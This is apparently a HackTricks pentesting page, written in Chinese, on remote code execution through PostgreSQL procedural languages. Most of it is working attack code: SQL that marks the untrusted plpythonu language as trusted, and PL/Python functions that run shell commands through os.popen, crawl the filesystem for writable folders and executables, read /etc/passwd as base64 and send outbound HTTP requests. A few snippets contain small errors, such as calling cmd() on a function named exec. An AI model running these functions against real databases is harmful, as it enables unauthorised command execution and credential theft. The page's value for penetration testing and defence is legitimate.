RCE with PostgreSQL Languages

从零开始学习 AWS 黑客技术，成为专家 htARTE（HackTricks AWS 红队专家）！

您在网络安全公司工作吗？想要看到您的公司在 HackTricks 中宣传吗？或者想要访问PEASS 的最新版本或下载 HackTricks 的 PDF吗？请查看订阅计划!
发现我们的独家NFTs收藏品The PEASS Family
获取官方 PEASS & HackTricks 商品
加入 💬 Discord 群组 或 电报群组 或关注我的 Twitter 🐦@carlospolopm。
通过向 hacktricks 仓库 和 hacktricks-cloud 仓库 提交 PR 来分享您的黑客技巧。

PostgreSQL 语言

您访问的 PostgreSQL 数据库可能安装了不同的脚本语言，您可以滥用这些语言来执行任意代码。

您可以使它们运行：

\dL *

SELECT lanname,lanpltrusted,lanacl FROM pg_language;

大多数您可以在PostgreSQL中安装的脚本语言都有2种类型：受信任和不受信任。不受信任的语言名称以"u"结尾，这些版本允许您执行代码并使用其他有趣的功能。以下是一些安装后会很有趣的语言：

plpythonu
plpython3u
plperlu
pljavaU
plrubyu
...（任何其他使用不安全版本的编程语言）

如果您发现一个有趣的语言已经被PostgreSQL 安装但被标记为不受信任（lanpltrusted为false），您可以尝试使用以下命令信任它，这样PostgreSQL就不会施加任何限制：

UPDATE pg_language SET lanpltrusted=true WHERE lanname='plpythonu';
# To check your permissions over the table pg_language
SELECT * FROM information_schema.table_privileges WHERE table_name = 'pg_language';

如果您找不到一种语言，您可以尝试使用以下方式加载它（您需要是超级管理员）：

CREATE EXTENSION plpythonu;
CREATE EXTENSION plpython3u;
CREATE EXTENSION plperlu;
CREATE EXTENSION pljavaU;
CREATE EXTENSION plrubyu;

请注意，将安全版本编译为“不安全”是可能的。例如，可以查看此链接。因此，即使只发现安装了受信任的版本，尝试执行代码也是值得的。

plpythonu/plpython3u

CREATE OR REPLACE FUNCTION exec (cmd text)
RETURNS VARCHAR(65535) stable
AS $$
import os
return os.popen(cmd).read()
#return os.execve(cmd, ["/usr/lib64/pgsql92/bin/psql"], {})
$$
LANGUAGE 'plpythonu';

SELECT cmd("ls"); #RCE with popen or execve

CREATE OR REPLACE FUNCTION get_user (pkg text)
RETURNS VARCHAR(65535) stable
AS $$
import os
return os.getlogin()
$$
LANGUAGE 'plpythonu';

SELECT get_user(""); #Get user, para is useless

CREATE OR REPLACE FUNCTION lsdir (dir text)
RETURNS VARCHAR(65535) stable
AS $$
import json
from os import walk
files = next(walk(dir), (None, None, []))
return json.dumps({"root": files[0], "dirs": files[1], "files": files[2]})[:65535]
$$
LANGUAGE 'plpythonu';

SELECT lsdir("/"); #List dir

CREATE OR REPLACE FUNCTION findw (dir text)
RETURNS VARCHAR(65535) stable
AS $$
import os
def my_find(path):
writables = []
def find_writable(path):
if not os.path.isdir(path):
return
if os.access(path, os.W_OK):
writables.append(path)
if not os.listdir(path):
return
else:
for item in os.listdir(path):
find_writable(os.path.join(path, item))
find_writable(path)
return writables

return ", ".join(my_find(dir))
$$
LANGUAGE 'plpythonu';

SELECT findw("/"); #Find Writable folders from a folder (recursively)

CREATE OR REPLACE FUNCTION find_file (exe_sea text)
RETURNS VARCHAR(65535) stable
AS $$
import os
def my_find(path):
executables = []
def find_executables(path):
if not os.path.isdir(path):
executables.append(path)

if os.path.isdir(path):
if not os.listdir(path):
return
else:
for item in os.listdir(path):
find_executables(os.path.join(path, item))
find_executables(path)
return executables

a = my_find("/")
b = []

for i in a:
if exe_sea in os.path.basename(i):
b.append(i)
return ", ".join(b)
$$
LANGUAGE 'plpythonu';

SELECT find_file("psql"); #Find a file

CREATE OR REPLACE FUNCTION findx (dir text)
RETURNS VARCHAR(65535) stable
AS $$
import os
def my_find(path):
executables = []
def find_executables(path):
if not os.path.isdir(path) and os.access(path, os.X_OK):
executables.append(path)

if os.path.isdir(path):
if not os.listdir(path):
return
else:
for item in os.listdir(path):
find_executables(os.path.join(path, item))
find_executables(path)
return executables

a = my_find(dir)
b = []

for i in a:
b.append(os.path.basename(i))
return ", ".join(b)
$$
LANGUAGE 'plpythonu';

SELECT findx("/"); #Find an executables in folder (recursively)

CREATE OR REPLACE FUNCTION find_exe (exe_sea text)
RETURNS VARCHAR(65535) stable
AS $$
import os
def my_find(path):
executables = []
def find_executables(path):
if not os.path.isdir(path) and os.access(path, os.X_OK):
executables.append(path)

if os.path.isdir(path):
if not os.listdir(path):
return
else:
for item in os.listdir(path):
find_executables(os.path.join(path, item))
find_executables(path)
return executables

a = my_find("/")
b = []

for i in a:
if exe_sea in i:
b.append(i)
return ", ".join(b)
$$
LANGUAGE 'plpythonu';

SELECT find_exe("psql"); #Find executable by susbstring

CREATE OR REPLACE FUNCTION read (path text)
RETURNS VARCHAR(65535) stable
AS $$
import base64
encoded_string= base64.b64encode(open(path).read())
return encoded_string.decode('utf-8')
return open(path).read()
$$
LANGUAGE 'plpythonu';

select read('/etc/passwd'); #Read a file in b64

CREATE OR REPLACE FUNCTION get_perms (path text)
RETURNS VARCHAR(65535) stable
AS $$
import os
status = os.stat(path)
perms = oct(status.st_mode)[-3:]
return str(perms)
$$
LANGUAGE 'plpythonu';

select get_perms("/etc/passwd"); # Get perms of file

CREATE OR REPLACE FUNCTION req2 (url text)
RETURNS VARCHAR(65535) stable
AS $$
import urllib
r = urllib.urlopen(url)
return r.read()
$$
LANGUAGE 'plpythonu';

SELECT req2('https://google.com'); #Request using python2

CREATE OR REPLACE FUNCTION req3 (url text)
RETURNS VARCHAR(65535) stable
AS $$
from urllib import request
r = request.urlopen(url)
return r.read()
$$
LANGUAGE 'plpythonu';

SELECT req3('https://google.com'); #Request using python3

pgSQL

检查以下页面：

pagePL/pgSQL Password Bruteforce

C

检查以下页面：

pageRCE with PostgreSQL Extensions

从零开始学习AWS黑客技术，成为专家 htARTE (HackTricks AWS Red Team Expert)!

您在网络安全公司工作吗？想要在HackTricks中宣传您的公司吗？或者您想要访问PEASS的最新版本或下载HackTricks的PDF吗？请查看订阅计划!
发现我们的独家NFTs收藏品The PEASS Family
获取官方PEASS & HackTricks周边
加入 💬 Discord群 或 电报群 或在Twitter上关注我 🐦@carlospolopm.
通过向hacktricks repo 和 hacktricks-cloud repo 提交PR来分享您的黑客技巧。

上一页Big Binary Files Upload (PostgreSQL)下一页RCE with PostgreSQL Extensions

最后更新于3个月前